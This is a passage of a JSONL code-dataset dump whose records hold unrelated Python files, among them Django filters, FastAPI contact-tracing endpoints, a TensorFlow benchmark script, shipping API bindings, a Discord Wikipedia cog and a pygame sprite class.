return\r\n","sub_path":"res/scripts/client/gui/Scaleform/daapi/view/battle/legacy/damage_panel.py","file_name":"damage_panel.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"93947854","text":"import re\n\n# Define a movie object\nclass Movie(object):\n\t\n\t# Base url for poster images\n\tBASE_URL_IMAGE = \"http://image.tmdb.org/t/p/original/\"\n\t# Base url for 
trailers\n\tBASE_URL_VIDEO = \"https://youtu.be/\"\n\n\t# Initializes a movie object\n\tdef __init__(self, title, overview, release, poster, trailer):\n\t\tself.title = re.sub(r':(.*)','',title)\n\t\tself.overview = overview\n\t\tself.release = release\n\t\tself.poster_image_url = Movie.BASE_URL_IMAGE + poster\n\t\tself.trailer_youtube_url = Movie.BASE_URL_VIDEO + trailer\t\n\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"528032131","text":"# -*- coding: utf-8 -*-\n'''\nCopyright (c) 2017 ntels Co., LTD.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nCreated on 2017. Feb. 20.\n\n@author: asurada\n'''\nimport json\nfrom datetime import datetime\nfrom collections import OrderedDict\nimport string\nimport random\n\nclass JSONEncoder(json.JSONEncoder):\n # @override\n def default(self, obj):\n if isinstance(obj, datetime):\n return obj.isoformat() + 'Z'\n elif hasattr(obj, '__getstate__'):\n return obj.__getstate__()\n else:\n return json.JSONEncoder.default(self, obj)\n\nclass MQTTModel:\n def __init__(self, deviceID=None, deviceKey=None):\n self.deviceID = deviceID\n self.deviceKey = deviceKey\n\n def setDeviceReqCmdModelJson(self, requestValue=None):\n dic = OrderedDict()\n dic[\"message_type\"] = \"device.cmd\"\n dic[\"device_key\"] = self.deviceKey\n dic[\"command_id\"] = ''.join(random.SystemRandom().choice(string.ascii_letters + string.digits)\n for _ in range(24))\n dic[\"request_value\"] = requestValue\n return json.dumps(dic, sort_keys=False, ensure_ascii=False)\n\n def setNodeReqCmdModelJson(self, requestValue=None, nodeID=None):\n dic = OrderedDict()\n dic[\"message_type\"] = \"node.cmd\"\n dic[\"device_key\"] = self.deviceKey\n dic[\"node_id\"] = nodeID\n dic[\"command_id\"] = ''.join(random.SystemRandom().choice(string.ascii_letters + string.digits)\n for _ in range(24))\n dic[\"request_value\"] = requestValue\n return json.dumps(dic, sort_keys=False, ensure_ascii=False)\n\n","sub_path":"AoT/util/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"174840971","text":"from rest_framework_chain import ChainedFilterSet, RelatedFilter, AllLookupsFilter\n\nfrom .models import Shipment, ShipmentLineItem\nfrom apps.products.filters import SkuFilter\nfrom apps.purchasing.filters import PurchaseOrderFilter\nfrom apps.vauth.filters import UserFilter\n\n\nclass ShipmentFilter(ChainedFilterSet):\n \"\"\"\n filter for `receiving.Shipment` model\n \"\"\"\n\n received_by = RelatedFilter(UserFilter, name='received_by')\n purchase_order = RelatedFilter(PurchaseOrderFilter, name='purchase_order')\n id = AllLookupsFilter(name='id')\n\n class Meta:\n model = Shipment\n fields = ('received_by', 'purchase_order', 'id',)\n\n\nclass ShipmentLineItemFilter(ChainedFilterSet):\n \"\"\"\n filter for `receiving.ShipmentLineItem` model\n \"\"\"\n\n 
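# illustrative usage (URL and query are hypothetical, field names taken from the\n    # filters above): a request such as\n    #   /shipment-line-items/?shipment__purchase_order__id=42&quantity__gte=10\n    # chains through ShipmentFilter -> PurchaseOrderFilter via RelatedFilter, while\n    # AllLookupsFilter enables every ORM lookup (exact, lt, gte, in, ...) on a field\n    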
shipment = RelatedFilter(ShipmentFilter, name='shipment')\n sku = RelatedFilter(SkuFilter, name='sku')\n quantity = AllLookupsFilter(name='quantity')\n id = AllLookupsFilter(name='id')\n\n class Meta:\n model = ShipmentLineItem\n fields = ('shipment', 'sku', 'quantity', 'id',)\n","sub_path":"apps/receiving/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"290655921","text":"\"\"\"\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which,\n\na2 + b2 = c2\nFor example, 3^2 + 4^2 = 5^2\n 9 + 16 = 25 \n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\nFind the product abc.\n\"\"\"\nimport time\n\nstartTime = time.time()\n\n\ndef PythagoreanTriplet():\n for a in range(1,1000):\n for b in range(1,1000):\n c = 1000-a-b\n if(a**2 + b**2) == c**2:\n return a*b*c\n\n \n\nprint(PythagoreanTriplet())\n# numbers are 200,375,425 and multiplies 31875000\n\nendTime = time.time()\n\nprint(\"time {} \".format(endTime-startTime))\n","sub_path":"Problem9.py","file_name":"Problem9.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"323865850","text":"\"\"\"Functions related to converting content into dict/JSON structures.\"\"\"\n\nimport json\nimport logging\n\nfrom django.conf import settings\nfrom django.core.files.storage import get_storage_class\n\nfrom pyquery import PyQuery\n\n\nlog = logging.getLogger(__name__)\n\n\ndef generate_sections_from_pyquery(body, fjson_storage_path):\n \"\"\"Given a pyquery object, generate section dicts for each section.\"\"\"\n\n # Removing all
tags to prevent duplicate indexing with Sphinx Domains.\n try:\n # remove all <dl> tags which contains <dt>
tags having 'id' attribute\n dt_tags = body('dt[id]')\n dt_tags.parents('dl').remove()\n except Exception:\n log.exception('Error removing
tags from file: %s', fjson_storage_path)\n\n # remove toctree elements\n try:\n body('.toctree-wrapper').remove()\n except Exception:\n log.exception('Error removing toctree elements from file: %s', fjson_storage_path)\n\n # Capture text inside h1 before the first h2\n h1_section = body('.section > h1')\n if h1_section:\n div = h1_section.parent()\n h1_title = h1_section.text().replace('¶', '').strip()\n h1_id = div.attr('id')\n h1_content = ''\n next_p = body('h1').next()\n while next_p:\n if next_p[0].tag == 'div' and 'class' in next_p[0].attrib:\n if 'section' in next_p[0].attrib['class']:\n break\n\n text = parse_content(next_p.text(), remove_first_line=True)\n if h1_content:\n h1_content = f'{h1_content.rstrip(\".\")}. {text}'\n else:\n h1_content = text\n\n next_p = next_p.next()\n if h1_content:\n yield {\n 'id': h1_id,\n 'title': h1_title,\n 'content': h1_content.replace('\\n', '. '),\n }\n\n # Capture text inside h2's\n section_list = body('.section > h2')\n for num in range(len(section_list)):\n div = section_list.eq(num).parent()\n header = section_list.eq(num)\n title = header.text().replace('¶', '').strip()\n section_id = div.attr('id')\n\n content = div.text()\n content = parse_content(content, remove_first_line=True)\n\n yield {\n 'id': section_id,\n 'title': title,\n 'content': content,\n }\n\n\ndef process_file(fjson_storage_path):\n \"\"\"Read the fjson file from disk and parse it into a structured dict.\"\"\"\n storage = get_storage_class(settings.RTD_BUILD_MEDIA_STORAGE)()\n\n log.debug('Processing JSON file for indexing: %s', fjson_storage_path)\n\n try:\n with storage.open(fjson_storage_path, mode='r') as f:\n file_contents = f.read()\n except IOError:\n log.info('Unable to read file: %s', fjson_storage_path)\n raise\n data = json.loads(file_contents)\n sections = []\n path = ''\n title = ''\n domain_data = {}\n\n if 'current_page_name' in data:\n path = data['current_page_name']\n else:\n log.info('Unable to index file due to no name %s', fjson_storage_path)\n\n if data.get('body'):\n body = PyQuery(data['body'])\n sections.extend(generate_sections_from_pyquery(body.clone(), fjson_storage_path))\n domain_data = generate_domains_data_from_pyquery(body.clone(), fjson_storage_path)\n else:\n log.info('Unable to index content for: %s', fjson_storage_path)\n\n if 'title' in data:\n title = data['title']\n title = PyQuery(data['title']).text().replace('¶', '').strip()\n else:\n log.info('Unable to index title for: %s', fjson_storage_path)\n\n return {\n 'path': path,\n 'title': title,\n 'sections': sections,\n 'domain_data': domain_data,\n }\n\n\ndef parse_content(content, remove_first_line=False):\n \"\"\"Removes new line characters and ¶.\"\"\"\n content = content.replace('¶', '').strip()\n\n # removing the starting text of each\n content = content.split('\\n')\n if remove_first_line and len(content) > 1:\n content = content[1:]\n\n # converting newlines to \". \"\n content = '. 
'.join([text.strip().rstrip('.') for text in content])\n return content\n\n\ndef _get_text_for_domain_data(desc_contents):\n \"\"\"Returns the text from the PyQuery object ``desc_contents``.\"\"\"\n # remove the 'dl', 'dt' and 'dd' tags from it\n # because all the 'dd' and 'dt' tags are inside 'dl'\n # and all 'dl' tags are already captured.\n desc_contents.remove('dl')\n desc_contents.remove('dt')\n desc_contents.remove('dd')\n\n # remove multiple spaces, new line characters and '¶' symbol.\n docstrings = parse_content(desc_contents.text())\n return docstrings\n\n\ndef generate_domains_data_from_pyquery(body, fjson_storage_path):\n \"\"\"\n Given a pyquery object, generate sphinx domain objects' docstrings.\n\n Returns a dict with the generated data.\n The returned dict is in the following form::\n\n {\n \"domain-id-1\": \"docstrings for the domain-id-1\",\n \"domain-id-2\": \"docstrings for the domain-id-2\",\n }\n \"\"\"\n\n domain_data = {}\n dl_tags = body('dl')\n\n for dl_tag in dl_tags:\n\n dt = dl_tag.findall('dt')\n dd = dl_tag.findall('dd')\n\n # len(dt) should be equal to len(dd)\n # because these tags go together.\n for title, desc in zip(dt, dd):\n try:\n id_ = title.attrib.get('id')\n if id_:\n # clone the PyQuery objects so that\n # the original one remains undisturbed\n docstrings = _get_text_for_domain_data(PyQuery(desc).clone())\n domain_data[id_] = docstrings\n except Exception:\n log.exception('Error parsing docstrings for domains in file %s', fjson_storage_path)\n\n return domain_data\n","sub_path":"readthedocs/search/parse_json.py","file_name":"parse_json.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"420152701","text":"from typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom fastapi.security import HTTPBasicCredentials\nfrom pydantic import BaseModel\n\nfrom .utils import get_or_404\nfrom ..db.firebase.firebase import Firebase, get_firebase\nfrom ..db.sql.database import Database\nfrom ..db.utils import get_db\nfrom ..security import check_handler_auth, security\n\nrouter = APIRouter()\n\n\nclass UserLookup(BaseModel):\n phone: str\n\n\nclass User(BaseModel):\n fuid: str\n status: str\n\n\n@router.post(\"/get-user\", response_model=User)\ndef get_user(lookup: UserLookup,\n credentials: HTTPBasicCredentials = Depends(security),\n firebase: Firebase = Depends(get_firebase),\n db: Database = Depends(get_db)):\n \"\"\"Find user by his phone number.\"\"\"\n check_handler_auth(db, credentials)\n user = get_or_404(firebase.get_user_by_phone(lookup.phone))\n return User(fuid=user[\"fuid\"], status=\"unknown\")\n\n\nclass ProximityRecord(BaseModel):\n buid: str\n start: int\n end: int\n status: str\n phone: str\n\n\n@router.get(\"/proximity/{fuid}\", response_model=List[ProximityRecord])\ndef get_proximity(fuid: str,\n credentials: HTTPBasicCredentials = Depends(security),\n firebase: Firebase = Depends(get_firebase),\n db: Database = Depends(get_db)):\n \"\"\"Return information about proximity of the given user\"\"\"\n check_handler_auth(db, credentials)\n records = get_or_404(firebase.get_proximity_records(fuid))\n return [ProximityRecord(\n buid=r[\"buid\"],\n start=r[\"timestampStart\"],\n end=r[\"timestampEnd\"],\n status=\"unknown\",\n phone=r[\"phoneNumber\"]\n ) for r in records]\n\n\nclass UserStatus(BaseModel):\n status: str\n\n\n@router.post(\"/change-user-status/{fuid}\")\ndef change_user_status(fuid: str,\n status: UserStatus,\n 
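# Self-contained sketch of what parse_content above does to extracted text,
# assuming the same rules: strip pilcrows, optionally drop the first line,
# then fold the remaining newlines into '. ' separators.
def parse_content(content, remove_first_line=False):
    content = content.replace('¶', '').strip()
    lines = content.split('\n')
    if remove_first_line and len(lines) > 1:
        lines = lines[1:]
    return '. '.join(text.strip().rstrip('.') for text in lines)

sample = "Section Title¶\nFirst sentence.\nSecond sentence."
print(parse_content(sample, remove_first_line=True))
# -> First sentence. Second sentence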
credentials: HTTPBasicCredentials = Depends(security),\n firebase: Firebase = Depends(get_firebase),\n db: Database = Depends(get_db)):\n \"\"\"Change the infected status of a user\"\"\"\n check_handler_auth(db, credentials)\n if not firebase.change_user_status(fuid, status.status):\n raise HTTPException(status_code=404)\n","sub_path":"src/btwa_api/app/api/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"246644420","text":"# sp20-516-240 E.Cloudmesh.Common.3\n\n# Develop a program that demonstrates the use of FlatDict.\n\nfrom cloudmesh.common.FlatDict import FlatDict\n\nclass Common3:\n\n def doit(self):\n data = {\n 'name': 'Falconi',\n 'address': {\n 'city': 'Portland',\n 'state': 'OR'\n }\n }\n\n flat = FlatDict(data)\n print(f\"My name is {flat.name}\")\n print(f\"The City I live in is {flat.address__city}\")\n print(f\"The State I live in is {flat.address__state}\")\n\n\nif __name__ == \"__main__\":\n c = Common3()\n c.doit()\n","sub_path":"cloudmesh-exercises/e-cloudmesh-3.py","file_name":"e-cloudmesh-3.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"359967567","text":"import asyncio\nimport discord\nimport wikipedia\nimport textwrap\nfrom discord.ext import commands\nfrom Cogs import Settings\n\ndef setup(bot):\n\t# Add the bot\n\tbot.add_cog(Wiki(bot))\n\n# This is the Face module. It sends faces.\n\nclass Wiki:\n\n\t# Init with the bot reference, and a reference to the settings var\n\tdef __init__(self, bot):\n\t\tself.bot = bot\n\n\t@commands.command(pass_context=True)\n\tasync def wiki(self, ctx, *, search : str = None):\n\t\t\"\"\"Search Wikipedia!\"\"\"\n\t\tif search == None:\n\t\t\tawait ctx.channel.send(\"Usage: `{}wiki [search terms]`\".format(ctx.prefix))\n\t\t\treturn\n\t\t\n\t\tresults = wikipedia.search(search)\n\n\t\tif not len(results):\n\t\t\tawait ctx.channel.send(\"No results :(\")\n\t\t\treturn\n\n\t\t# Assume the first result\n\t\tnewSearch = results[0]\n\t\t# Try to get a hit\n\t\ttry:\n\t\t\twik = wikipedia.page(newSearch)\n\t\texcept wikipedia.DisambiguationError:\n\t\t\tawait ctx.channel.send(\"That search wasn't specific enough - try again with more detail.\")\n\t\t\treturn\n\n\t\t# Create our embed\n\t\twiki_embed = discord.Embed(color=ctx.author.color)\n\t\twiki_embed.title = wik.title\n\t\twiki_embed.url = wik.url\n\t\ttextList = textwrap.wrap(wik.content, 500, break_long_words=True, replace_whitespace=False)\n\t\twiki_embed.add_field(name=\"Wikipedia Results\", value=textList[0]+\"...\")\n\n\t\tawait ctx.channel.send(embed=wiki_embed)","sub_path":"Cogs/Wiki.py","file_name":"Wiki.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"48531155","text":"#!/usr/bin/env python\n\n\"\"\"\nBenchmark script for TensorFlow.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags as absl_flags\nimport tensorflow as tf\n\nimport benchmark_cnn\nimport cnn_util\nimport flags\nfrom cnn_util import log_fn\nimport pprint\n\nflags.define_flags()\nfor name in flags.param_specs.keys():\n absl_flags.declare_key_flag(name)\n\n\ndef main(positional_arguments):\n # Command-line arguments like '--distortions False' are equivalent to\n # '--distortions=True False', where False is a positional argument. 
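# The FlatDict demo above depends on cloudmesh.common; a dependency-free sketch
# of the same flattening idea (nested keys joined with '__') is shown below.
# This flatten helper is illustrative, not cloudmesh's implementation.
def flatten(d, parent_key='', sep='__'):
    items = {}
    for k, v in d.items():
        key = f"{parent_key}{sep}{k}" if parent_key else k
        if isinstance(v, dict):
            items.update(flatten(v, key, sep))
        else:
            items[key] = v
    return items

data = {'name': 'Falconi', 'address': {'city': 'Portland', 'state': 'OR'}}
flat = flatten(data)
print(flat['address__city'])  # Portland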
To prevent\n # this from silently running with distortions, we do not allow positional\n # arguments.\n\n # For DGX servers use hierarchical_copy=True argument\n\n assert len(positional_arguments) >= 1\n if len(positional_arguments) > 1:\n raise ValueError('Received unknown positional arguments: %s'\n % positional_arguments[1:])\n\n tests_models = [\n {'num_gpus': None, 'batch_size': 64, 'variable_update': 'parameter_server', 'model': 'inception3'},\n {'num_gpus': None, 'batch_size': 64, 'variable_update': 'parameter_server', 'model': 'resnet50'},\n {'num_gpus': None, 'batch_size': 32, 'variable_update': 'parameter_server', 'model': 'resnet152'}, #batch=64 crashes\n {'num_gpus': None, 'batch_size': 64, 'variable_update': 'replicated', 'model': 'vgg16'},\n {'num_gpus': None, 'batch_size': 512, 'variable_update': 'replicated', 'model': 'alexnet'}\n ]\n\n test_gpus = [1, 2, 4, 8]\n\n stats = []\n for test in tests_models:\n for num_gpus in test_gpus:\n test['num_gpus'] = num_gpus\n\n params = benchmark_cnn.make_params_from_flags()\n params = benchmark_cnn.setup(params)\n\n # force --hierarchical_copy to False when using 1 GPU\n if num_gpus == 1:\n params = params._replace(hierarchical_copy=False)\n\n params = params._replace(num_gpus=test['num_gpus'],\n batch_size=test['batch_size'],\n model=test['model'],\n variable_update=test['variable_update']\n )\n\n bench = benchmark_cnn.BenchmarkCNN(params)\n\n tfversion = cnn_util.tensorflow_version_tuple()\n log_fn('TensorFlow: %i.%i' % (tfversion[0], tfversion[1]))\n\n bench.print_info()\n results = bench.run()\n # result\n # {\n # 'average_wall_time': 0.6646941304206848,\n # 'images_per_sec': 385.1395525908701,\n # 'last_average_loss': 7.256145,\n # 'num_steps': 100,\n # 'num_workers': 1\n # }\n stats.append({'test': test.copy(),\n 'result': results})\n\n\n # summary\n print('summary:')\n print('==========')\n pprint.pprint(stats)\n\n print('==========')\n s = ''\n for i in range(len(test_gpus)):\n for j in range(len(tests_models)):\n s += str(stats[i + j * len(test_gpus)]['result']['images_per_sec'])\n s += ', '\n s += '\\n'\n print(s)\n print('==========')\n\n\nif __name__ == '__main__':\n app.run(main) # Raises error on invalid flags, unlike tf.app.run()\n","sub_path":"scripts/tf_cnn_benchmarks/gpu_bench.py","file_name":"gpu_bench.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"178216678","text":"# Postmaster Python bindings\n# API docs at http://postmaster.io/docs\n# Author: Jesse Lovelace \n\nfrom .version import *\nfrom .http import *\nfrom .conf import config\n\ntry:\n import json\nexcept ImportError:\n try:\n import simplejson as json\n except ImportError:\n raise\n\n\nclass PostmasterObject(object):\n \"\"\"\n Base object for Postmaster. Allows slightly easlier access to data and\n some REST-like opertations.\n \"\"\"\n \n ARGS = []\n PATH = None\n \n def __init__(self, **kwargs):\n if self.ARGS:\n for k in kwargs.iterkeys():\n if not k in self.ARGS:\n raise TypeError('%s is an invalid argument for %s.' 
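# The benchmark driver above clones an immutable params object per run via
# _replace; a minimal standalone sketch of that pattern with a plain namedtuple
# (the field names here are made up for illustration).
from collections import namedtuple

Params = namedtuple('Params', ['num_gpus', 'batch_size', 'model', 'hierarchical_copy'])
base = Params(num_gpus=1, batch_size=64, model='resnet50', hierarchical_copy=True)

for num_gpus in (1, 2, 4, 8):
    # _replace returns a new tuple; the base config is never mutated
    run = base._replace(num_gpus=num_gpus, hierarchical_copy=(num_gpus > 1))
    print(run)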
% (k, self.__class__.__name__))\n \n self._data = kwargs\n\n def __getattr__(self, name):\n if not name in self._data:\n raise AttributeError(\"Cannot find attribute.\")\n \n return self._data[name]\n \n def __repr__(self):\n return ' JSON: %s' % (self.__class__.__name__, id(self), self._data)\n\n def put(self, id_=None, action=None):\n \"\"\"\n Put object to server.\n \"\"\"\n if id_:\n response = HTTPTransport.put(\n action and '%s/%s/%s' % (self.PATH, id_, action) or \\\n '%s/%s' % (self.PATH, id_),\n self._data, headers=config.headers)\n else:\n response = HTTPTransport.post(self.PATH, self._data, headers=config.headers)\n return response\n \n def get(self, id_=None, action=None, params=None):\n \"\"\"\n Get object(s) from server.\n \"\"\"\n\n if id_:\n response = HTTPTransport.get(\n action and '%s/%s/%s' % (self.PATH, id_, action) or \\\n '%s/%s' % (self.PATH, id_), params, headers=config.headers)\n else:\n response = HTTPTransport.get(\n self.PATH, params, headers=config.headers)\n return response\n\n\nclass Tracking(PostmasterObject):\n pass\n\n\nclass Rate(PostmasterObject):\n PATH = '/v1/rates'\n\n\nclass TimeInTransit(PostmasterObject):\n PATH = '/v1/times'\n\n\nclass Address(PostmasterObject):\n\n PATH = '/v1/validate'\n\n def __init__(self, company=None, contact=None, line1=None, line2=None, line3=None, city=None, state=None, zip_code=None, country=None):\n kwargs = dict(\n company=company,\n contact=contact,\n line1=line1,\n city=city,\n state=state,\n zip_code=zip_code,\n country=country\n )\n if line2:\n kwargs['line2'] = line2\n if line3:\n kwargs['line3'] = line3\n super(Address, self).__init__(**kwargs)\n\n def validate(self):\n return self.put()\n\n\nclass Shipment(PostmasterObject):\n\n PATH = '/v1/shipments'\n\n @classmethod\n\n def create(cls, to, packages, service, from_=None, carrier=None, reference=None, options=None):\n \"\"\"\n Create a new shipment.\n\n Arguments:\n\n * to (required) - a dict representing the ship-to address:\n * company\n * contact\n * street - a list of strings defining the street address\n * city\n * state\n * zip\n * packages (required) - a dict (or list of dicts) representing the package:\n * weight\n * length\n * width\n * height\n * from (optional) - a dict representing the ship-from address.\n Will use default for account if not provided.\n * customs (optional)\n \"\"\"\n\n shipment = Shipment()\n shipment._data = {\n 'to': to,\n 'packages': packages,\n 'service': service,\n }\n\n if from_:\n shipment._data['from'] = from_\n if carrier:\n shipment._data['carrier'] = carrier\n if reference:\n shipment._data['reference'] = reference\n if options:\n shipment._data['options'] = options\n\n resp = shipment.put()\n\n shipment._data.update(resp)\n shipment.id = resp['id']\n\n return shipment\n\n @classmethod\n def retrieve(cls, package_id):\n \"\"\"\n Retrieve a package by ID.\n \"\"\"\n shipment = Shipment()\n shipment._data = shipment.get(package_id)\n return shipment\n\n def track(self):\n \"\"\"\n Track a shipment (from an object)\n \"\"\"\n return Tracking(**self.get(self.id, 'track'))\n\n def void(self):\n \"\"\"\n Void a shipment (from an object)\n \"\"\"\n self.put(self.id, 'void')\n\n\nclass Package(PostmasterObject):\n PATH = '/v1/packages'\n weight_units = ['LB', 'OZ', 'KG', 'G']\n size_units = ['IN', 'FT', 'CM', 'M']\n\n @classmethod\n def create(cls, width, height, length, weight=None, weight_units='LB', size_units='IN', name=None):\n \"\"\"\n Create a new box.\n\n Arguments:\n\n * width (required) - The width of the box.\n * 
height (required) - The height of the box.\n * length (required) - The length of the box.\n * weight The weight of the box.\n * weight_units - The units used to measure weight. LB, OZ, KG, or G\n * size_units - The units used to measure sizes. IN, FT, CM, or M\n * name - A memorable name.\n \"\"\"\n\n box = Package()\n box._data = {\n 'width': width,\n 'height': height,\n 'length': length,\n }\n\n if weight:\n box._data['weight'] = weight\n if weight_units in cls.weight_units:\n box._data['weight_units'] = weight_units\n if size_units in cls.size_units:\n box._data['size_units'] = size_units\n if name:\n box._data['name'] = name\n\n resp = box.put()\n\n box._data.update(resp)\n box.id = resp['id']\n\n return box\n\n @classmethod\n def list(cls, limit=10, cursor=None):\n \"\"\"\n Retrieve a list of all user-defined box types.\n\n Arguments:\n\n * limit (optional) - Number of boxes to get. Default 10.\n * cursor (optional) - Cursor offset.\n \"\"\"\n\n boxes = Package()\n resp = boxes.get()\n\n boxes._data.update(resp)\n\n return boxes\n\n @classmethod\n def fit(cls, items, packages=None, package_limit=None):\n \"\"\"\n Given a set of box types, try to fill it optimally.\n\n Arguments:\n\n * items (required) - A list of items (dicts) to fit into the box.\n * width (required)\n * height (required)\n * length (required)\n * weight\n * weight_units - Choices: LB, OZ, KG, or G.\n * size_units - Choices: IN, FT, CM, or M.\n * name\n * sku\n * packages (optional) - A list of package types to use. (Default is use API boxes).\n * width (required)\n * height (required)\n * length (required)\n * weight\n * weight_units - Choices: LB, OZ, KG, or G.\n * size_units - Choices: IN, FT, CM, or M.\n * package_limit (optional) - A maximum number of packages to create.\n \"\"\"\n\n fit = Package()\n fit.PATH += '/fit'\n fit._data = {'items': items}\n if packages:\n fit._data['packages'] = packages\n if package_limit:\n fit._data['package_limit'] = package_limit\n\n resp = fit.put()\n\n fit._data.update(resp)\n\n return fit\n\n\ndef track_by_reference(tracking_number):\n \"\"\"\n Track any package by it's carrier-specific tracking number.\n Note: if this package was not shipped my Postmaster\n the resulting data will not contain detailed information\n about the shipment.\n \"\"\"\n return HTTPTransport.get('/v1/track', dict(tracking=tracking_number))\n\n\ndef validate_address(address_object):\n \"\"\"\n Validate that an address is correct.\n \"\"\"\n pass\n\n\ndef get_transit_time(from_zip, to_zip, weight, carrier=None):\n \"\"\"\n Find the time needed for a package to get from point A to point B\n \"\"\"\n tit = TimeInTransit(\n from_zip=from_zip,\n to_zip=to_zip,\n weight=weight,\n carrier=carrier,\n )\n return tit.put()\n\n\ndef get_rate(carrier, to_zip, weight, from_zip=None, service='ground'):\n \"\"\"\n Find the cost to ship a package from point A to point B.\n \"\"\"\n rate = Rate(\n from_zip=from_zip,\n to_zip=to_zip,\n weight=weight,\n carrier=carrier,\n service=service,\n )\n\n return rate.put()\n\n\ndef get_token():\n return HTTPTransport.get('/v1/token')\n","sub_path":"postmaster/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"215135381","text":"from math import sin, cos, radians\nimport random\nimport itertools\nimport pygame as pg\n\nimport prepare\nimport tools\n\n\ndef footprint_collide(left, right):\n \"\"\"\n Checks for collision between two sprites using 
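# Based on the Shipment.create docstring above, a call payload would be shaped
# roughly as below. All address and package values are placeholders; a real
# request additionally needs API credentials and a live Postmaster endpoint.
to = {
    'company': 'ACME',
    'contact': 'Jane Doe',
    'street': ['123 Example St'],
    'city': 'Austin',
    'state': 'TX',
    'zip': '78701',
}
packages = [{'weight': 1.5, 'length': 10, 'width': 6, 'height': 8}]
shipment_data = {'to': to, 'packages': packages, 'service': '2DAY'}
print(shipment_data)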
their footprint rects instead of\n their image rects. Used as callback for sprite collision detection methods.\n \"\"\"\n return left.footprint.colliderect(right.footprint)\n\n \nSPRITE_SIZE = (32, 36)\n\n\nclass RPGSprite(pg.sprite.DirtySprite):\n \"\"\"Base class for player and AI sprites.\"\"\"\n def __init__(self, pos, speed, footprint_size, name, facing=\"DOWN\", *groups):\n super(RPGSprite, self).__init__(*groups)\n self.speed = speed\n self.name = name\n self.direction = facing\n self.old_direction = None \n self.direction_stack = [] \n self.redraw = True \n self.animate_timer = 0.0\n self.animate_fps = 10.0\n self.walkframes = None\n self.walkframe_dict = self.make_frame_dict(self.get_frames(name))\n self.adjust_images()\n self.rect = self.image.get_rect(midbottom=pos)\n #rect for collision detection\n self.footprint = pg.Rect((0,0), footprint_size)\n self.footprint.midbottom = self.rect.midbottom\n self.dirty = 1\n\n def get_frames(self, character):\n \"\"\"Get a list of all frames.\"\"\"\n sheet = prepare.GFX[\"characters\"][character]\n all_frames = tools.split_sheet(sheet, SPRITE_SIZE, 3, 4)\n return all_frames\n\n def make_frame_dict(self, frames):\n \"\"\"Create a dictionary of animation cycles for each direction.\"\"\"\n frame_dict = {}\n for i,direct in enumerate(prepare.DIRECTIONS):\n frame_dict[direct] = itertools.cycle([frames[i][0], frames[i][2]])\n return frame_dict\n\n def wrap_move(self, screen_rect):\n \"\"\"\n Move sprite's rect and footprint to opposite side of\n screen if rect is completely off-screen.\n \"\"\"\n if self.rect.right < 0:\n self.rect.move_ip((screen_rect.width, 0))\n self.dirty = 1\n elif self.rect.left > screen_rect.right:\n self.rect.move_ip((-screen_rect.width, 0))\n self.dirty = 1\n elif self.rect.bottom < 0:\n self.rect.move_ip((0, screen_rect.height))\n self.dirty = 1\n elif self.rect.top > screen_rect.bottom:\n self.rect.move_ip((0, -screen_rect.height))\n self.dirty = 1\n self.footprint.midbottom = self.rect.midbottom\n \n def screen_wrap(self, screen_rect, all_sprites, wrapped_sprites):\n \"\"\"\n Create a temporary sprite to display the portion of self.image\n that is off-screen and adds it to all_sprites for drawing and\n wrapped_sprites for culling on the next tick.\n \"\"\" \n x, y = self.rect.topleft\n w, h = self.rect.size\n if self.rect.left < 0:\n sub_rect = pg.Rect((0, 0), (abs(x), h))\n wrap_rect = pg.Rect((screen_rect.right + x, y), sub_rect.size)\n elif self.rect.right > screen_rect.right:\n sub_w = self.rect.right - screen_rect.right\n sub_rect = pg.Rect((w - sub_w, 0), (sub_w, h))\n wrap_rect = pg.Rect((0, y), sub_rect.size)\n elif self.rect.top < 0:\n sub_rect = pg.Rect((0, 0), (w, abs(y)))\n wrap_rect = pg.Rect((x, screen_rect.bottom + y), sub_rect.size)\n elif self.rect.bottom > screen_rect.bottom:\n sub_h = self.rect.bottom - screen_rect.bottom\n sub_rect = pg.Rect((0, h - sub_h), (w, sub_h))\n wrap_rect = pg.Rect((x, 0), sub_rect.size)\n \n sprite = pg.sprite.DirtySprite(all_sprites, wrapped_sprites)\n sprite.image = self.image.subsurface(sub_rect)\n sprite.rect = wrap_rect\n sprite.dirty = 1\n all_sprites.change_layer(sprite, sprite.rect.bottom)\n self.dirty = 1\n \n def adjust_images(self, now=0):\n 